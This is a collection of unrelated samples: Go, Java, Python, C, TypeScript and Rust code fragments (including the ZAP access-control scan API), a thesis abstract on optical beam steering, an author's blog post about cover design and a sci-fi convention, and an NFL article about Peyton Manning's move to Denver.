// AddSkipRegex allows to add a new regex to pass to ginkgo with the --skip flag.
// In case the flag is already set, the new regex is appended (existing or new)
func (g GinkgoFlags) AddSkipRegex(val string) {
g.mergeRegex("skip", val)
}
func (g GinkgoFlags) mergeRegex(key, val string) {
if exp, ok := g[key]; !ok {
g[key] = val
} else {
g[key] = fmt.Sprintf("%s|%s", exp, val)
}
}
// SuiteFlags defines a type for handling flag/values pairs to be passed to the test suite
type SuiteFlags map[string]string
// NewSuiteFlags returns a new SuiteFlags struct created by parsing the space-separated list of arguments
func NewSuiteFlags(flagString string) (SuiteFlags, error) {
testFlags, err := parseFlagsString(flagString)
if err != nil {
return nil, err
}
return testFlags, nil
}
// parseFlagsString parse the space-separated list of arguments
func parseFlagsString(flagString string) (flags map[string]string, err error) {
flags = make(map[string]string)
if flagString == "" {
return
}
// splits the space-separated list and parse all the --key=value argument
for _, arg := range strings.Split(flagString, " ") {
key, val, err := parseFlagString(arg)
if err != nil {
return nil, errors.Errorf("flag %q could not be parsed correctly: %v", arg, err)
}
flags[key] = val
}
return flags, nil
}
// parseFlagString parse a --key=value argument in the space-separated list of arguments
func parseFlagString(arg string) (string, string, error) {
if !strings.HasPrefix(arg, "--") {
return "", "", errors.New("the argument should start with '--'")
}
if !strings.Contains(arg, "=") {
return "", "", errors.New("the argument should have a '=' between the flag name and the value")
}
// Remove the starting --
arg = strings.TrimPrefix(arg, "--")
// Split the string on =. Return only two substrings, since we want only key/value, but the value can include '=' as well
keyvalSlice := strings.SplitN(arg, "=", 2)
// Make sure both a key and value is present
if len(keyvalSlice) != 2 {
return "", "", errors.New("the argument must have both a key and a value")
}
if len(keyvalSlice[0]) == 0 {
return "", "", errors.New("the argument must have a key")
}
return keyvalSlice[0], keyvalSlice[1], nil
}
|
// TODO: 2018/1/4 reactive is not supported yet, omega context won't be updated on shared threads
@Test
public void passesOmegaContextThroughReactiveX() throws Exception {
Flowable.just(user)
.parallel()
.runOn(Schedulers.io())
.doOnNext(new Consumer() {
@Override
public void accept(Object user) throws Exception {
userService.add((User)user);
}
})
.sequential()
.subscribe();
waitTillSavedUser(username);
assertArrayEquals(
new String[] {
new TxStartedEvent(globalTxId, newLocalTxId, globalTxId, compensationMethod, 0, "", 0, 0, 0, 0, 0, user).toString(),
new TxEndedEvent(globalTxId, newLocalTxId, globalTxId, compensationMethod).toString()},
toArray(messages)
);
} |
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from scipy import signal
import pycqed.measurement.kernel_functions_ZI as ZI_kern
mpl.rcParams['font.size'] = 12
mpl.rcParams['legend.fontsize'] = 12
mpl.rcParams['figure.titlesize'] = 'medium'
# Settings
fs = 2.4e9
time_start = -100e-9
time_start = np.around(time_start*fs)/fs
time_end = 100e-9
time = np.arange(time_start, time_end, 1/fs)
delay = 10.1e-9
amplitude = 0.1
# Construct impulse_response
impulse = np.zeros(len(time))
zero_ind = np.argmin(np.abs(time))
impulse[zero_ind] = 1.0
delay_ind = np.argmin(np.abs(time-delay))
impulse_response = np.copy(impulse)
impulse_response[delay_ind] = amplitude
# Derive step response
step = np.zeros(len(time))
step[time >= 0.0] = 1.0
step_response = signal.lfilter(impulse_response[zero_ind:], 1.0, step)
# Compute ideal inverted filter kernel
a = ZI_kern.ideal_inverted_fir_kernel(impulse_response, zero_ind)
a1 = ZI_kern.first_order_bounce_kern(delay, -amplitude, fs)
# Apply ideal inverted filter to impulse response and step response
impulse_response_corr = signal.lfilter(a, 1.0, impulse_response)
step_response_corr = signal.lfilter(a, 1.0, step_response)
# Apply first-order inverted filter to impulse response and step response
impulse_response_corr1 = signal.lfilter(a1, 1.0, impulse_response)
step_response_corr1 = signal.lfilter(a1, 1.0, step_response)
# Apply hardware-friendly filter to impulse response and step response
impulse_response_corr_hw = ZI_kern.multipath_first_order_bounce_correction(impulse_response, round(delay*fs), amplitude)
step_response_corr_hw = ZI_kern.multipath_first_order_bounce_correction(step_response, round(delay*fs), amplitude)
# Plot impulse response comparison
plt.figure(1, figsize=(14,10))
plt.subplot(2, 2, 1)
plt.plot(time*1e9, impulse_response)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(a) Impulse response')
plt.subplot(2, 2, 2)
plt.plot(time*1e9, impulse_response_corr)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(b) Ideal corrected impulse response')
plt.subplot(2, 2, 3)
plt.plot(time*1e9, impulse_response_corr1)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(b) First-order corrected impulse response')
plt.subplot(2, 2, 4)
plt.plot(time*1e9, impulse_response_corr_hw)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(c) Simulated hardware-corrected impulse response')
plt.tight_layout()
plt.savefig('impulse_response.png',dpi=600,bbox_inches='tight')
plt.show()
# Plot step response comparison
plt.figure(1, figsize=(14,10))
plt.subplot(2, 2, 1)
plt.plot(time*1e9, step_response)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(a) Step response')
plt.subplot(2, 2, 2)
plt.plot(time*1e9, step_response_corr)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(b) Ideal corrected step response')
plt.subplot(2, 2, 3)
plt.plot(time*1e9, step_response_corr1)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(b) First-order corrected step response')
plt.subplot(2, 2, 4)
plt.plot(time*1e9, step_response_corr_hw)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(c) Simulated hardware-corrected step response')
plt.tight_layout()
plt.savefig('step_response.png',dpi=600,bbox_inches='tight')
plt.show()
# Sawtooth test waveform
sawtooth_period = 50e-9
ideal_waveform = np.remainder(2*time/sawtooth_period, 1)
distorted_waveform = signal.lfilter(impulse_response[zero_ind:], 1.0, ideal_waveform)
# Apply ideal inverted filter to the waveform
distorted_waveform_corr = signal.lfilter(a, 1.0, distorted_waveform)
# Apply first-order filter to the waveform
distorted_waveform_corr1 = signal.lfilter(a1, 1.0, distorted_waveform)
# Apply hardware-friendly filter to the waveform
distorted_waveform_corr_hw = ZI_kern.multipath_first_order_bounce_correction(distorted_waveform, round(delay*fs), amplitude)
# Compute errors with respect to the ideal waveform
err = ideal_waveform - distorted_waveform_corr
err1 = ideal_waveform - distorted_waveform_corr1
err_hw = ideal_waveform - distorted_waveform_corr_hw
# Plot the test waveform comparison
plt.figure(1, figsize=(14,14))
plt.subplot(4, 2, 1)
plt.plot(time*1e9, ideal_waveform)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(a) Ideal waveform')
plt.subplot(4, 2, 2)
plt.plot(time*1e9, distorted_waveform)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(b) Distorted waveform')
plt.subplot(4, 2, 3)
plt.plot(time*1e9, distorted_waveform_corr)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(c) Ideal corrected waveform')
plt.subplot(4, 2, 4)
plt.plot(time*1e9, err)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(d) Error of ideal correction')
plt.subplot(4, 2, 5)
plt.plot(time*1e9, distorted_waveform_corr1)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(c) First-order correction')
plt.subplot(4, 2, 6)
plt.plot(time*1e9, err1)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(d) Error of first-order correction')
plt.subplot(4, 2, 7)
plt.plot(time*1e9, distorted_waveform_corr_hw)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(e) Simulated hardware-frienldy first-order corrected waveform')
plt.subplot(4, 2, 8)
plt.plot(time*1e9, err_hw)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(f) Error of hardware-friendly correction')
plt.tight_layout()
plt.savefig('test_waveform.png', dpi=600, bbox_inches='tight')
plt.show()
|
/*
* Zed Attack Proxy (ZAP) and its related class files.
*
* ZAP is an HTTP/HTTPS proxy for assessing web application security.
*
* Copyright 2019 The ZAP Development Team
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.zaproxy.zap.extension.accessControl;
import java.io.File;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.ParserConfigurationException;
import net.sf.json.JSONObject;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.parosproxy.paros.Constant;
import org.parosproxy.paros.control.Control;
import org.parosproxy.paros.control.Control.Mode;
import org.parosproxy.paros.core.scanner.Alert;
import org.zaproxy.zap.extension.accessControl.AccessControlScannerThread.AccessControlScanStartOptions;
import org.zaproxy.zap.extension.api.ApiAction;
import org.zaproxy.zap.extension.api.ApiException;
import org.zaproxy.zap.extension.api.ApiImplementor;
import org.zaproxy.zap.extension.api.ApiResponse;
import org.zaproxy.zap.extension.api.ApiResponseElement;
import org.zaproxy.zap.extension.api.ApiView;
import org.zaproxy.zap.extension.users.ExtensionUserManagement;
import org.zaproxy.zap.users.User;
import org.zaproxy.zap.utils.ApiUtils;
public class AccessControlAPI extends ApiImplementor {
private static final String PREFIX = "accessControl";
private ExtensionAccessControl extension;
private static ExtensionUserManagement usersExtension;
private static final String ACTION_SCAN = "scan";
private static final String ACTION_WRITE_HTML_REPORT = "writeHTMLreport";
private static final String VIEW_GET_SCAN_PROGRESS = "getScanProgress";
private static final String VIEW_GET_SCAN_STATUS = "getScanStatus";
private static final String PARAM_CONTEXT_ID = "contextId";
private static final String PARAM_USER_ID = "userId";
private static final String PARAM_RAISE_ALERT = "raiseAlert";
private static final String PARAM_ALERT_RISK_LEVEL = "alertRiskLevel";
private static final String PARAM_UNAUTH_USER = "scanAsUnAuthUser";
private static final String PARAM_FILENAME = "fileName";
private static final Logger LOGGER = LogManager.getLogger(AccessControlAPI.class);
/** Provided only for API client generator usage. */
public AccessControlAPI() {
this(null);
}
public AccessControlAPI(ExtensionAccessControl extension) {
this.extension = extension;
this.addApiAction(
new ApiAction(
ACTION_SCAN,
new String[] {PARAM_CONTEXT_ID, PARAM_USER_ID},
new String[] {
PARAM_UNAUTH_USER, PARAM_RAISE_ALERT, PARAM_ALERT_RISK_LEVEL
}));
this.addApiAction(
new ApiAction(
ACTION_WRITE_HTML_REPORT, new String[] {PARAM_CONTEXT_ID, PARAM_FILENAME}));
this.addApiView(new ApiView(VIEW_GET_SCAN_PROGRESS, new String[] {PARAM_CONTEXT_ID}));
this.addApiView(new ApiView(VIEW_GET_SCAN_STATUS, new String[] {PARAM_CONTEXT_ID}));
}
@Override
public String getPrefix() {
return PREFIX;
}
@Override
public ApiResponse handleApiAction(String name, JSONObject params) throws ApiException {
ApiResponse result = null;
switch (name) {
case ACTION_SCAN:
LOGGER.debug("Access control start scan called");
AccessControlScanStartOptions startOptions = new AccessControlScanStartOptions();
startOptions.setTargetContext(
ApiUtils.getContextByParamId(params, PARAM_CONTEXT_ID));
Mode mode = Control.getSingleton().getMode();
if (Mode.safe.equals(mode)) {
throw new ApiException(
ApiException.Type.MODE_VIOLATION,
Constant.messages.getString(
"accessControl.scanOptions.error.mode.safe"));
} else if (Mode.protect.equals(mode)
&& !startOptions.getTargetContext().isInScope()) {
throw new ApiException(
ApiException.Type.MODE_VIOLATION,
Constant.messages.getString(
"accessControl.scanOptions.error.mode.protected",
startOptions.getTargetContext().getName()));
}
if (usersExtension == null) {
usersExtension =
Control.getSingleton()
.getExtensionLoader()
.getExtension(ExtensionUserManagement.class);
}
List<User> users = new ArrayList<>();
String[] commaSeparatedUserIDs =
ApiUtils.getNonEmptyStringParam(params, PARAM_USER_ID).split("\\s*,\\s*");
for (int i = 0; i < commaSeparatedUserIDs.length; i++) {
int userID;
try {
userID = Integer.parseInt(commaSeparatedUserIDs[i]);
} catch (NumberFormatException nfe) {
throw new ApiException(
ApiException.Type.ILLEGAL_PARAMETER,
"Failed to parse userID (int).",
nfe);
}
User userToAdd =
usersExtension
.getContextUserAuthManager(
startOptions.getTargetContext().getId())
.getUserById(userID);
if (userToAdd != null) {
users.add(userToAdd);
} else {
throw new ApiException(
ApiException.Type.USER_NOT_FOUND,
"No user found for userID: " + userID);
}
}
startOptions.setTargetUsers(users);
// Add unauthenticated user
if (params.optBoolean(PARAM_UNAUTH_USER, false)) {
startOptions.getTargetUsers().add(null);
}
startOptions.setRaiseAlerts(params.optBoolean(PARAM_RAISE_ALERT, true));
startOptions.setAlertRiskLevel(
params.optInt(PARAM_ALERT_RISK_LEVEL, Alert.RISK_HIGH));
if (!(startOptions.getAlertRiskLevel() >= Alert.RISK_INFO
&& startOptions.getAlertRiskLevel() <= Alert.RISK_HIGH)) {
throw new ApiException(
ApiException.Type.ILLEGAL_PARAMETER,
"The parsed Alert Risk Level was outside the range: "
+ Alert.RISK_INFO
+ " to "
+ Alert.RISK_HIGH);
}
extension.startScan(startOptions);
result = ApiResponseElement.OK;
break;
case ACTION_WRITE_HTML_REPORT:
LOGGER.debug("Write HTML report called");
File reportFile = new File(params.getString(PARAM_FILENAME));
try {
extension.generateAccessControlReport(
ApiUtils.getIntParam(params, PARAM_CONTEXT_ID), reportFile);
result = new ApiResponseElement(name, "OK");
} catch (ParserConfigurationException pce) {
String pceMessage = "Failed to generate access control report: ";
LOGGER.error(pceMessage, pce);
throw new ApiException(ApiException.Type.INTERNAL_ERROR, pceMessage, pce);
}
// Have to add the check because ReportGenerator.XMLToHtml() won't raise an
// exception
if (!reportFile.exists() || !reportFile.canWrite()) {
String writeFailedMessage =
"Error writing report to file " + reportFile.getPath();
LOGGER.error(writeFailedMessage);
throw new ApiException(ApiException.Type.INTERNAL_ERROR, writeFailedMessage);
}
break;
default:
throw new ApiException(ApiException.Type.BAD_ACTION);
}
return result;
}
@Override
public ApiResponse handleApiView(String name, JSONObject params) throws ApiException {
ApiResponse result;
int contextId;
switch (name) {
case VIEW_GET_SCAN_PROGRESS:
LOGGER.debug("Access control get scan progress called");
contextId = ApiUtils.getContextByParamId(params, PARAM_CONTEXT_ID).getId();
String scanStatus;
try {
scanStatus = String.valueOf(extension.getScanProgress(contextId));
} catch (IllegalStateException ise) {
throw new ApiException(
ApiException.Type.DOES_NOT_EXIST,
"Failed to obtain scan progress for contextId: " + contextId);
}
result = new ApiResponseElement(name, scanStatus);
break;
case VIEW_GET_SCAN_STATUS:
LOGGER.debug("Access control get scan status called");
contextId = ApiUtils.getContextByParamId(params, PARAM_CONTEXT_ID).getId();
result = new ApiResponseElement(name, extension.getScanStatus(contextId));
break;
default:
throw new ApiException(ApiException.Type.BAD_VIEW);
}
return result;
}
}
|
//after the request is done, this method is being performed
@Override
protected void onPostExecute(Elevation elevation) {
super.onPostExecute(elevation);
googleElevation = elevation;
String alt = String.format("%.2f m", elevation.getAltitude());
currentGoogleAltitudeText.setText(alt);
LatLng point = new LatLng(lat, lon);
mMap.addMarker(new MarkerOptions().position(point).title(String.format("Google Altitude= %.2f m", googleElevation.getAltitude())));
mMap.moveCamera(CameraUpdateFactory.newLatLngZoom(point, 18.5f));
Log.e("google received", "google received");
isGoogleUpdated = true;
} |
'use strict';
import {inject, View, DetailAPI} from '../../../index';
import {ITaskData} from 'teambition';
@inject([
'DetailAPI',
'$filter'
])
export class EditRecurrenceView extends View {
public detail: any;
public recurrence = [
{
name: '从不',
recurrence: null,
isSelected: false
},
{
name: '每天',
recurrence: 'RRULE:FREQ=DAILY;INTERVAL=1',
isSelected: false
},
{
name: '每周',
recurrence: 'RRULE:FREQ=WEEKLY;INTERVAL=1',
isSelected: false
},
{
name: '每两周',
recurrence: 'RRULE:FREQ=WEEKLY;INTERVAL=2',
isSelected: false
},
{
name: '每月',
recurrence: 'RRULE:FREQ=MONTHLY;INTERVAL=1',
isSelected: false
}
];
private DetailAPI: DetailAPI;
private boundToObjectId: string;
private boundToObjectType: string;
private lastIndex: number;
private $filter: any;
public onInit() {
this.boundToObjectId = this.$state.params._id;
this.boundToObjectType = this.$state.params.type;
return this.DetailAPI.fetch(this.boundToObjectId, this.boundToObjectType)
.then((task: ITaskData) => {
this.detail = task;
if (!this.detail.recurrence) {
this.recurrence[0].isSelected = true;
this.lastIndex = 0;
}else {
for (let index = 1; index < this.recurrence.length; index++) {
let element = this.recurrence[index];
let parsedRecurrence = this.$filter('recurrenceStr')(this.detail.recurrenceTime);
if (element.name === parsedRecurrence) {
element.isSelected = true;
this.lastIndex = index;
}
}
}
});
}
public chooseRecurrence($index: number) {
this.showLoading();
return this.DetailAPI.update(this.boundToObjectId, this.boundToObjectType, {
recurrence: [this.recurrence[$index].recurrence]
})
.then(() => {
this.recurrence[this.lastIndex].isSelected = false;
this.recurrence[$index].isSelected = true;
this.lastIndex = $index;
this.showMsg('success', '更新成功', '已更新任务重复规则');
this.hideLoading();
window.history.back();
})
.catch((reason: any) => {
let message = this.getFailureReason(reason);
this.showMsg('error', '更新失败', message);
this.hideLoading();
window.history.back();
});
}
}
angular.module('teambition').controller('EditRecurrenceView', EditRecurrenceView);
|
Free-Space Optical Beam Steering for Wireless Communications
The implementation of optical of wireless communications (OWC) requires the use of a light-emitting-diode (LED) or laser diode (LD). Due to significant path loss exhibited by these sources in an outdoor environment, an unobstructed point-to-point link must be maintained in order to increase the signal-to-noise ratio (SNR) at the receiver. This thesis considers a solution to alleviate the fundamental limitations of the OWC channel in an outdoor environment
by investigating optical beam steering (OBS) to increase the signal strength in the desired direction. Conventional methods to implement on OBS use a microelectromechanical (MEMS) mirror or a spatial light modulator (SLM) which both suffer from low switching frequency. A high frequency OBS device can be created by using optical phased array (OPA). An electro-optic modulator (EOM) such as LiNbO3 can be used to create an OPA but can not be directly integrated in silicon. For monolithic silicon-on-insulator (SOI) solutions, previous literature uses thermo-optic couplers on SOI to implement the OPA, however this introduces the issue of thermal cross-talk. Therefore, this thesis focuses on the use of silicon as the EOM for use in an OPA to create a high frequency monolithic OBS.
Our contributions consist of providing a design method for a OBS SOI device which exhibits minimum internal cross-talk and provides propagation in free-space with high directivity and a wide steering range. Additionally, propose the use of an internal heterodyne optical phase locked loop (PLL) to stabilize the OBS instead of an external signal processor for phase correction. This optical PLL reduces beam jitter, minimizes beam squint, and provides active tracking for the output beam towards the receiver. We have also characterized a shadowing scenario in an OWC channel which OBS has the potential to alleviate. Moreover, we simulated the optical far-field radiation pattern from a SOI waveguide to free-space which has not been demonstrated in previous research. Finally, our simulation results of a SOI OPA demonstrates the coherent combining capability of OBS using MEEPTtm and the Optiwavetm suite. |
/********************************************************************/
/* Below are the functions required by the PAPI component interface */
/********************************************************************/
static int
_sde_init_component( int cidx )
{
SUBDBG("_sde_init_component...\n");
_sde_vector.cmp_info.num_native_events = 0;
_sde_vector.cmp_info.CmpIdx = cidx;
#if defined(DEBUG)
_sde_debug = _papi_hwi_debug&DEBUG_SUBSTRATE;
#endif
return PAPI_OK;
} |
/**
* @author jluo
* @date: 14 Jun 2019
*/
@TestConfiguration
public class DataStoreTestConfig {
@Bean
@Profile("offline")
public HttpClient httpClient() {
return Mockito.mock(HttpClient.class);
}
@Bean()
@Profile("offline")
public SolrClient solrClient() {
return Mockito.mock(SolrClient.class);
}
@Bean
@Profile("offline")
public SolrRequestConverter requestConverter() {
return new SolrRequestConverter() {
@Override
public JsonQueryRequest toJsonQueryRequest(SolrRequest request) {
JsonQueryRequest solrQuery = super.toJsonQueryRequest(request);
// required for tests, because EmbeddedSolrServer is not sharded
((ModifiableSolrParams) solrQuery.getParams()).set("distrib", "false");
((ModifiableSolrParams) solrQuery.getParams()).set("terms.mincount", "1");
return solrQuery;
}
};
}
} |
// SetValue writes the user's current provider client to the cache.
func (cache *Cache) SetValue(cacheKey string, cacheValue *CacheItem) error {
err := cache.all()
if err != nil {
return err
}
if cacheValue == nil {
delete(cache.items, cacheKey)
} else {
cache.items[cacheKey] = *cacheValue
}
filename, err := cacheFile()
if err != nil {
return err
}
cache.Lock()
defer cache.Unlock()
data, err := json.Marshal(cache.items)
err = ioutil.WriteFile(filename, data, 0644)
if err != nil {
return fmt.Errorf("Error setting cache value: %s", err)
}
return nil
} |
def handle_listing(self, listing, resource_class):
listing_object = extract_listing_data(listing)
listing_object_dupe_check = models.Listing.objects.filter(
system_id=listing_object.system_id)
if listing_object_dupe_check:
existing_listing_object = models.Listing.objects.get(
system_id=listing_object.system_id)
existing_listing_update_date = existing_listing_object.update_date
new_listing_update_date = listing_object.update_date
aware_existing_listing_update_date = existing_listing_update_date.replace(
tzinfo=pytz.UTC)
aware_new_listing_update_date = new_listing_update_date.replace(
tzinfo=pytz.UTC)
if aware_new_listing_update_date > aware_existing_listing_update_date:
updated_listing_object = update_core_listing_data(
existing_listing_object, listing_object)
updated_listing_object.save()
else:
try:
try:
listing_object.save()
new_objects_cache.append(listing_object)
except (IntegrityError, DataError, PG_DataError):
logger.debug(
'Received error when inserting new Listing object:')
logger.debug(traceback.print_exc(limit=None))
raise ListingException()
feature_objects = extract_feature_data(listing,
resource_class)
for feature_object in feature_objects:
listing_object.features.add(feature_object)
listing_object.save()
remark_object = extract_remark_data(listing)
remark_object.save()
listing_object.remark = remark_object
listing_object.save()
agent_object = extract_agent_data(listing)
if agent_object.agent_id:
agent_object_final, created = models.Agent.objects.get_or_create(
agent_id=agent_object.agent_id)
listing_object.agent_set.add(agent_object_final)
listing_object.save()
office_object = extract_office_data(listing)
if office_object.office_id:
office_object_final, created = models.Office.objects.get_or_create(
office_id=office_object.office_id)
listing_object.office_set.add(office_object_final)
listing_object.save()
tax_info_object = extract_tax_info_data(listing)
tax_info_object.listing = listing_object
tax_info_object.save()
virtual_tour_object = extract_virtual_tour_data(
listing)
virtual_tour_object.listing = listing_object
virtual_tour_object.save()
latitude, longitude = get_geocoordinates(
self.geolocator, listing_object)
listing_object.latitude = latitude
listing_object.longitude = longitude
listing_image_responses = fetch_listing_images(self.client, listing)
for part in listing_image_responses:
image_url = get_listing_image(part)
if len(image_url):
image_object = models.Photo(listing=listing_object,
url=get_listing_image(part))
image_object.save()
listing_object.save()
new_objects_cache.remove(listing_object)
updated_objects_count = globals().get('new_objects_count')
globals().update({'new_objects_count': updated_objects_count + 1})
except (ValueError, DataError, PG_DataError):
logger.debug(traceback.print_exc(limit=None))
try:
new_objects_cache.remove(listing_object)
except ValueError:
pass
raise ListingException() |
def drift(df: pd.DataFrame) -> np.ndarray:
t = df.groupby('profile')['time'].first().astype('int64') // 1e9
dt = np.diff(t)
x = df.groupby('profile')['lon'].first() * np.pi / 180
y = df.groupby('profile')['lat'].first() * np.pi / 180
ds = haversine_distance(x.values, y.values)
ds_dt = np.zeros_like(t)
for i in range(ds.shape[0]):
if np.abs(ds[i]) < 0.0001 and np.abs(dt[i]) < 0.0001:
ds_dt[i] = 0
else:
ds_dt[i] = ds[i] / dt[i]
return ds_dt |
import unittest
from cli import cli
import os
from translator import utils
class TestCli(unittest.TestCase):
os.chdir(utils.get_project_root_path())
def test_cli(self):
cli.main(['--template-file', 'examples/small_nfv_example.yaml', '--validate-only'])
def test_cli_change_wd(self):
os.chdir('examples')
try:
cli.main(['--template-file', 'small_nfv_example.yaml', '--validate-only'])
finally:
os.chdir(utils.get_project_root_path())
if __name__ == '__main__':
unittest.main()
|
<reponame>AlterionX/benxu.dev
//! Errors that can occur while using the capability endpoints.
pub(super) use diesel::result::Error as Diesel;
/// Represents possible errors from using the database for capabilities.
pub enum Error {
/// Database errors of many kinds.
DB(Diesel),
/// Insufficient capabilities for accessing an endpoint for capabilities.
Unauthorized,
}
impl From<Diesel> for Error {
fn from(e: Diesel) -> Self {
Self::DB(e)
}
}
impl From<Error> for rocket::http::Status {
fn from(e: Error) -> Self {
match e {
Error::DB(_) => Self::InternalServerError,
Error::Unauthorized => Self::Unauthorized,
}
}
}
|
Howdy, all! Just coming off a great weekend, great for sales (orbiting in and out of the Top 500 Kindles on Amazon), garnering great reviews (and one who was NOT a fan (sorry, dude)), and gathering some truly great numbers here on the blog (my highest number of hits EVAR). I really should hold contests and make dictates about sci-fi-coolness more often.
And now I’m about to sit down to an Irish/New England Boiled Dinner, with corned beef, kielbasa, linguica, potatoes, onions, cabbage, carrots, and my third Guinness of the night. St. Paddy’s Day tis a wonderful thing!
Being that things are rosy in writerly circles, I decided to doff my writer’s hat (it’s a dunce cap) and try on a couple of my other hats in order to challenge myself. I left the Real Job’s hat in the closet, because who wants to think about the real world on a day like today. Instead, I whipped out my artiste’s beret, and decided to focus on myself as a visual arts fella’.
As those of you who follow know, I did my own art for the book, and from that art, I created my own cover. Now, I think I did a good job, and I don’t believe the amateur nature of my cover has done my sales any harm. But, not all books can say that, and it is generally advised that any writer who hires himself to do the cover art for his own book has a fool for a client (that saying may have originated elsewhere, I don’t recall). To determine whether or not the aphorism applied to me, I decided to put myself even further out there. First, I offered up my cover to the new site CoverCritics.com for the inaugural week. Nathan Shumate also runs LousyBookCovers.com, but this new site is all about CONSTRUCTIVE criticism rather than schadenfreude. I encourage all of you aspiring cover artist/writers to check out BOTH sites before you attempt to do it yourself. As for how I did, the consensus seems to be that the art is good, it sells the book and clearly lays out the genre, but my title fonts don’t really fit the SF tone, and I tried to be too clever by putting in a metallic texture. I can’t fault the criticism, and when I eventually do put up a revised edition, I’ll see about applying them. Another guy criticized my lens flare, but if it’s good enough for J. J. Abrams, it’s good enough for me!
By that same token, I also entered my cover in Joel Friedlander’s E-book Cover Design Awards for the month of February and the results came back today. Well, he liked it and thought it was “effective” and he really liked the picture itself, but I didn’t win the grand prize or get a gold star. The competition was fierce, but Mr. Friedlander also likely saw the not-quite-right part of the titles that the others saw as well.
That’s things on the artist front, but I promised TWO hats in the title. Thusly, I doff the beret and slide on a Mad Men – esque fedora, straight from central casting. Wearing this hat, I’m focused on things of business and networking. Namely, I need to get out there more into the publishing industry, to meet authors, publishers, agents, and fans that might not have come across my Amazon postings or tweets. So, I’m going to take the ultimate SF nerd plunge and attend my first sci-fi convention.
The next con in my region is RavenCon, up in Richmond April 25-27. I’ve got the hotel room, the registration, made contacts with the Baen Barflies (the only people I know in attendance, and then only by forum postings), and I’m ordering fresh copies of the book to pass out and have commissioned an ad for the con program (below). I think it’ll be a lot of fun (my kind of fun — I couldn’t get the wife to even consider going). Hopefully, I can make some contacts, help the book and its eventual sequel, make some friends, and build some memories. A lot of the sniping, scandals, and arguing amongst fandom concerning “true” fandom, acceptable thought/attitudes/speech, and thin skins vs. true harassment that have been destroying the internet lately have me a little nervous, but I largely cannot help whatever has come before or where things stand now. I hope RavenCon doesn’t get too issue-oriented or political, but my general plan — as it is in all things — is to just be friendly, fun, and fascinating, and trust that my humble awesomeness will shine through to sunder all barriers.
I’ve got this in the bag!
(famous last words before Tom Mays was ripped to shreds by an angry mob of sci-fi fans from across the political landscape) |
/**
* Like {@link #contains(String, String, boolean)} but accepting {@code CharSequence} parameters.
*/
@GenIgnore
default boolean contains(CharSequence name, CharSequence value, boolean caseInsensitive) {
Predicate<String> predicate;
if (caseInsensitive) {
String valueAsString = value.toString();
predicate = val -> val.equalsIgnoreCase(valueAsString);
} else {
predicate = val -> val.contentEquals(value);
}
return getAll(name).stream().anyMatch(predicate);
} |
Five considerations now that Peyton Manning has told the San Francisco 49ers and Tennessee Titans he plans to sign with the Denver Broncos:
Big sighs of relief: Arizona, Seattle and St. Louis no longer must worry about defending against a Manning-led 49ers offense. A healthy Manning would have made the 49ers even more formidable than they were while going 5-1 against the division last season. It's looking like the Seahawks will be the team in the division with the best shot at upgrading their quarterback situation.
Harbaugh must take lead: The seemingly special bond between 49ers coach Jim Harbaugh and 2011 starter Alex Smith could need some repairing. That should not be too difficult if Harbaugh has been forthright with Smith throughout the process. The 49ers, like the Cardinals, will want to define their interest in Manning as a special case unrelated to their incumbent quarterback. Re-signing Smith should be a no-brainer now.
Smith's only logical option. Smith has made it known he wants to continue playing for the 49ers. Hurt feelings suffered during negotiations and the Manning diversion should not be grounds for divorce. Unless Smith acts hastily out of anger, which seems unlikely given his temperament, the 49ers should now be able to re-sign Smith to a deal that gives them the flexibility to hand things over to Colin Kaepernick in the next couple years if Smith falters. The 49ers did lose some leverage, however, when Manning picked Denver over Tennessee. A deal with the Titans would have pushed Matt Hasselbeck onto the market. |
<reponame>latonaio/sap-api-integrations-physical-inventory-document-reads<filename>SAP_API_Caller/responses/header.go
package responses
type Header struct {
D struct {
Results []struct {
Metadata struct {
ID string `json:"id"`
URI string `json:"uri"`
Type string `json:"type"`
Etag string `json:"etag"`
} `json:"__metadata"`
FiscalYear string `json:"FiscalYear"`
PhysicalInventoryDocument string `json:"PhysicalInventoryDocument"`
InventoryTransactionType string `json:"InventoryTransactionType"`
Plant string `json:"Plant"`
StorageLocation string `json:"StorageLocation"`
InventorySpecialStockType string `json:"InventorySpecialStockType"`
DocumentDate string `json:"DocumentDate"`
PhysInventoryPlannedCountDate string `json:"PhysInventoryPlannedCountDate"`
PhysicalInventoryLastCountDate string `json:"PhysicalInventoryLastCountDate"`
PostingDate string `json:"PostingDate"`
FiscalPeriod string `json:"FiscalPeriod"`
PostingIsBlockedForPhysInvtry bool `json:"PostingIsBlockedForPhysInvtry"`
PhysicalInventoryCountStatus string `json:"PhysicalInventoryCountStatus"`
